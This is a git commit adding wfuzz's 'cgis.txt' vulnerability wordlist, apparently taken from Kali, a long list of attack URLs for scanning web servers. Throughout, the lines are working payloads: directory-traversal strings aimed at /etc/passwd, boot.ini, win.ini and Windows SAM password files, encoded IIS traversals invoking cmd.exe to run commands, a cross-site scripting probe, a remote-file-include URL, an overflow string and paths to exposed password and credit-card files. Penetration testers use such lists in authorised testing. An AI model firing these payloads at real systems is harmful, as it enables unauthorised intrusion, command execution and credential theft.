Add additional wordlists from Kali

Signed-off-by: Malfurious <m@lfurio.us>

1 files changed, 3295 insertions, 0 deletions

diff --git a/wordlists/wfuzz/vulns/cgis.txt b/wordlists/wfuzz/vulns/cgis.txt
new file mode 100644
index 0000000..2acbfc6
--- /dev/null
+++ b/wordlists/wfuzz/vulns/cgis.txt
@@ -0,0 +1,3295 @@
+%00
+%00/
+%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
+%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+%2e/
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
+%2f/
+%3f.jsp
+%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+%5c/
+%NETHOOD%/
+%a%s%p%d
+*.*
+.%252e/.%252e/.%252e/winnt/boot.ini
+..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
+..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
+..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
+..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
+..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+...................../config.sys
+..................../boot.ini
+.................../boot.ini
+................../boot.ini
+................../config.sys
+................../etc/passwd
+................./boot.ini
+................/boot.ini
+.............../boot.ini
+............../boot.ini
+............./boot.ini
+............/boot.ini
+.........../boot.ini
+........../autoexec.bat
+........../boot.ini
+........./boot.ini
+......../boot.ini
+......./boot.ini
+....../
+....../ all
+....../autoexec.bat
+....../boot.ini
+....../config.sys
+....../etc/hosts
+...../boot.ini
+..../Windows/Admin.pwl
+..../boot.ini
+..../config.sys
+.../.../.../
+.../.../.../.../.../.../.../.../.../.../etc/passwd
+.../.../.../.../.../.../.../.../.../boot.ini
+.../boot.ini
+../../../../
+../../../../ all
+../../../../../../../../../../etc/*
+../../../../../../../../../../etc/passw*
+../../../../../../../../../../etc/passwd
+../../../../../../../../../boot.ini
+../../../../../../../../boot.ini
+../../../../../../../boot.ini
+../../../../../../Scandisk.log
+../../../../../../boot.ini
+../../../../../boot.ini
+../../../../../etc/passwd
+../../../../../winnt/repair/sam._
+../../../../boot.ini
+../../../../config.sys
+../../../../etc/hosts
+../../../../etc/passwd
+../../../../winnt/repair/sam._
+../../../autoexec.bat
+../../../boot.ini
+../../../etc/passwd
+../../../scandisk.log
+../../boot.ini
+../../etc/passwd
+../../passwd
+../../shadow
+../../windows/user.dat
+../../winnt/win.ini
+../boot.ini
+../config.dat
+../webserver.ini
+..\..\..\..\..\..\autoexec.bat
+..\..\..\..\..\..\temp\temp.class
+..\..\..\..\..\autoexec.bat
+..\..\..\..\autoexec.bat
+..\..\..\autoexec.bat
+..\..\..\winnt\repair\sam._
+..\..\autoexec.bat
+..\\..\\..\\..\\..\\..\\..\\boot.ini
+..\\..\\..\\..\\..\\..\autoexec.bat
+..\\..\\..\winnt\repair\sam._
+./
+.DS_Store
+.FBCIndex
+.access
+.addressbook
+.bash_history
+.bashrc
+.cobalt/sysManage/../admin/.htaccess
+.forward
+.history
+.htaccess
+.htaccess/
+.html/............*/config.sys
+.html/............./config.sys
+.html/............/autoexec.bat
+.htpasswd
+.htpasswd/
+.jpilot/
+.jsp/WEB-INF/classes/Env.java
+.lynx_cookies
+.mysql_history
+.nsconfig
+.nsf/../winnt/win.ini
+.passwd
+.perf
+.pinerc
+.plan
+.proclog
+.procmailrc
+.profile
+.psql_history
+.rhosts
+.sh_history
+.ssh
+.ssh/authorized_keys
+.ssh/known_hosts
+///./../.../boot.ini
+//etc/hosts
+//etc/passwd
+ADMINconfig.php
+ASP/cart/database/metacart.mdb
+ASPSamp/AdvWorks/equipment/catalog_type.asp
+Admin/
+Admin_files/order.log
+AdvWorks/equipment/catalog_type.asp
+Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+CFIDE/administrator/index.cfm
+CFIDE/probe.cfm
+COM
+CSNews.cgi
+CVS/Entries
+Config1.htm
+ConsoleHelp/login.jsp
+DB4Web/10.10.10.10:100
+DEASAppDesign.nsf
+DEASLog.nsf
+DEASLog01.nsf
+DEASLog02.nsf
+DEASLog03.nsf
+DEASLog04.nsf
+DEASLog05.nsf
+DEESAdmin.nsf
+Data/settings.xml+
+DomainFiles/*//../../../../../../../../../../etc/passwd
+GW5/GWWEB.EXE?HELP=bad-request
+GWWEB.EXE?HELP=bad-request
+GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
+Gozila.cgi
+IISSAMPLES/ExAir/Search/search.asp
+ISSamples/SQLQHit.asp
+ISSamples/sqlqhit.asp
+IlohaMail/blank.html
+JUNK(10)
+JUNK(10)abcd.html
+JUNK(223)<font%20size=50>DEFACED<!--//--
+JUNK(5).csp
+JUNK(5).htw
+JUNK(6).cfm?mode=debug
+Jigsaw/
+LOGIN.PWD
+MIDICART/midicart.mdb
+MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 
+MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+MWS/HandleSearch.html?searchTarget=test&B1=Submit
+Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
+NULL.printer
+NetDetector/middle_help_intro.htm
+Newuser?Image=../../database/rbsserv.mdb
+OpenFile.aspx?file=../../../../../../../../../../boot.ini
+OpenTopic
+Orders/order.log
+Orders/order_log.dat
+Orders/order_log_v12.dat
+PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
+PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+PDG_Cart/oder.log
+PDG_Cart/order.log
+PDG_Cart/shopper.conf
+POSTNUKEMy_eGallery/public/displayCategory.php
+PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
+ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
+Program%20Files/
+Proxy/LoginResponse
+README.TXT
+ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
+Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
+Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
+Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+SPHERA/login/sm_login_screen.php?error=\
+SPHERA/login/sm_login_screen.php?uid=\
+SQLQHit.asp
+SUNWmc/htdocs/
+SUNWmc/htdocs/en_US/
+Search
+SetSecurity.shm
+SilverStream
+SilverStream/Meta/Tables/?access-mode=text
+Site/biztalkhttpreceive.dll
+SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
+SiteScope/htdocs/SiteScope.html
+SiteServer/Admin/commerce/foundation/DSN.asp
+SiteServer/Admin/commerce/foundation/domain.asp
+SiteServer/Admin/commerce/foundation/driver.asp
+SiteServer/Admin/knowledge/dsmgr/default.asp
+SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
+SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
+SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
+SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
+SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
+SiteServer/Admin/knowledge/persmbr/vs.asp
+SiteServer/Knowledge/Default.asp?ctr=\
+SiteServer/Publishing/ViewCode.asp
+SiteServer/admin/
+SiteServer/admin/findvserver.asp
+Sites/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Push/ViewCode.asp
+Sites/Samples/Knowledge/Search/ViewCode.asp
+Survey/Survey.Htm
+T-admin.cgi
+TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
+TiVoConnect?Command=QueryServer
+USER/CONFIG.AP
+VBZooM/add-subject.php
+WEB-INF./web.xml
+WEB-INF/
+WEBAGENT/CQMGSERV/CF-SINFO.TPF
+WS_FTP.LOG
+WS_FTP.ini
+WebAdmin.dll?View=Logon
+WebShop/logs/cc.txt
+WebShop/logs/ck.log
+WebShop/templates/cc.txt
+WebSphereSamples
+Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
+XMBforum/buddy.php
+XMBforum/member.php
+XSQLConfig.xml
+Xcelerate/LoginPage.html
+[SecCheck]/..%252f..%252f../ext.ini
+[SecCheck]/..%255c..%255c../ext.ini
+[SecCheck]/..%2f../ext.ini
+\../boot.ini
+\../config.sys
+\../readme.txt
+_AuthChangeUrl
+_AuthChangeUrl?
+_cti_pvt/
+_head.php
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_mem_bin/
+_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir
+_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
+_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
+_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
+_mem_bin/.._../winnt/system32/cmd.exe?/c+dir
+_mem_bin/FormsLogin.asp
+_mem_bin/auoconfig.asp
+_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+_mem_bin/formslogin.asp?\
+_mem_bin/remind.asp
+_pages
+_private
+_private/
+_private/_vti_cnf/
+_private/form_results.html
+_private/form_results.txt
+_private/orders.htm
+_private/orders.txt
+_private/register.htm
+_private/register.txt
+_private/registrations.htm
+_private/registrations.txt
+_private/shopping_cart.mdb
+_vti_adm/admin.dll
+_vti_bin
+_vti_bin/
+_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
+_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir
+_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
+_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
+_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
+_vti_bin/.._../winnt/system32/cmd.exe?/c+dir
+_vti_bin/CGImail.exe
+_vti_bin/_vti_adm
+_vti_bin/_vti_aut
+_vti_bin/_vti_aut/author.dll
+_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false
+_vti_bin/_vti_aut/dvwssr.dll
+_vti_bin/_vti_aut/fp30reg.dll
+_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_vti_bin/_vti_cnf/
+_vti_bin/admin.pl
+_vti_bin/cfgwiz.exe
+_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/contents.htm
+_vti_bin/fpadmin.htm
+_vti_bin/fpcount.exe
+_vti_bin/fpcount.exe/
+_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
+_vti_bin/fpexe
+_vti_bin/fpremadm.exe
+_vti_bin/fpsrvadm.exe
+_vti_bin/shtml.dll
+_vti_bin/shtml.dll/_vti_rpc
+_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.dll/nosuch.htm
+_vti_bin/shtml.exe
+_vti_bin/shtml.exe/_vti_rpc
+_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/junk_nonexistant.exe
+_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
+_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+_vti_cnf/_vti_cnf/
+_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+_vti_inf.html
+_vti_log
+_vti_log/_vti_cnf/
+_vti_pvt
+_vti_pvt/
+_vti_pvt/access.cnf
+_vti_pvt/administrator.pwd
+_vti_pvt/administrators.pwd
+_vti_pvt/author.log
+_vti_pvt/authors.pwd
+_vti_pvt/doctodep.btr
+_vti_pvt/linkinfo.cnf
+_vti_pvt/service.cnf
+_vti_pvt/service.grp
+_vti_pvt/service.pwd
+_vti_pvt/services.cnf
+_vti_pvt/shtml.dll
+_vti_pvt/shtml.exe
+_vti_pvt/svacl.cnf
+_vti_pvt/users.pwd
+_vti_pvt/writeto.cnf
+_vti_txt
+_vti_txt/
+_vti_txt/_vti_cnf/
+a%5c.aspx
+a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini
+a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._
+a.asp/..%%35%63../..%%35%63../winnt/win.ini
+a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._
+a.asp/..%%35c../..%%35c../winnt/win.ini
+a.asp/..%%35c../..%%35c..\winnt\repair\sam._
+a.asp/..%25%35%63../..%25%35%63../winnt/win.ini
+a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam.
+a.asp/..%255c../..%255c../winnt/win.ini
+a.asp/..%255c../..%255c..\winnt\repair\sam._
+a.asp/..%u00255c../..%u00255c../winnt/win.ini
+a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._
+a.asp/..%u002f../..%u002f../winnt/win.ini
+a.asp/..%u002f../..%u002f..\winnt\repair\sam._
+a.asp/..%u005c../..%u005c../winnt/win.ini
+a.asp/..%u005c../..%u005c..\winnt\repair\sam._
+a.asp/..\../..\../winnt/repair/sam
+a.jsp//..//..//..//..//..//../winnt/win.ini
+a_domlog.nsf
+a_security.htm
+ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
+ab2/\@AdminViewError
+abczxv.htw
+abonnement.asp
+acart2_0/acart2_0.mdb
+acart2_0/admin/category.asp
+acartpath/signin.asp?|-|0|404_Object_Not_Found
+access-log
+access.log
+account.nsf
+accounts.nsf
+accounts/getuserdesc.asp
+achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+acid/
+acid/acid_main.php
+ackdoor
+active.log
+add.php
+add_acl
+add_user.php
+addressbook.php?\
+addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
+admcgi/contents.htm
+admcgi/scripts/Fpadmcgi.exe
+admentor/adminadmin.asp
+admin-serv/config/admpw
+admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
+admin.cgi
+admin.htm
+admin.html
+admin.nsf
+admin.php
+admin.php3
+admin.php3?admin=anything
+admin.php4?reg_login=1
+admin.php?en_log_id=0&action=config
+admin.php?en_log_id=0&action=users
+admin.pl
+admin.shtml
+admin/
+admin/admin.php?adminpy=1
+admin/admin.shtml
+admin/admin_phpinfo.php4
+admin/adminproc.asp
+admin/aindex.htm
+admin/auth.php
+admin/browse.asp?FilePath=c:\&Opt=2&level=0
+admin/cfg/configscreen.inc.php+
+admin/cfg/configsite.inc.php+
+admin/cfg/configsql.inc.php+
+admin/cfg/configtache.inc.php+
+admin/cms/htmltags.php
+admin/contextAdmin/contextAdmin.html
+admin/cplogfile.log
+admin/credit_card_info.php
+admin/database/wwForum.mdb
+admin/datasource.asp
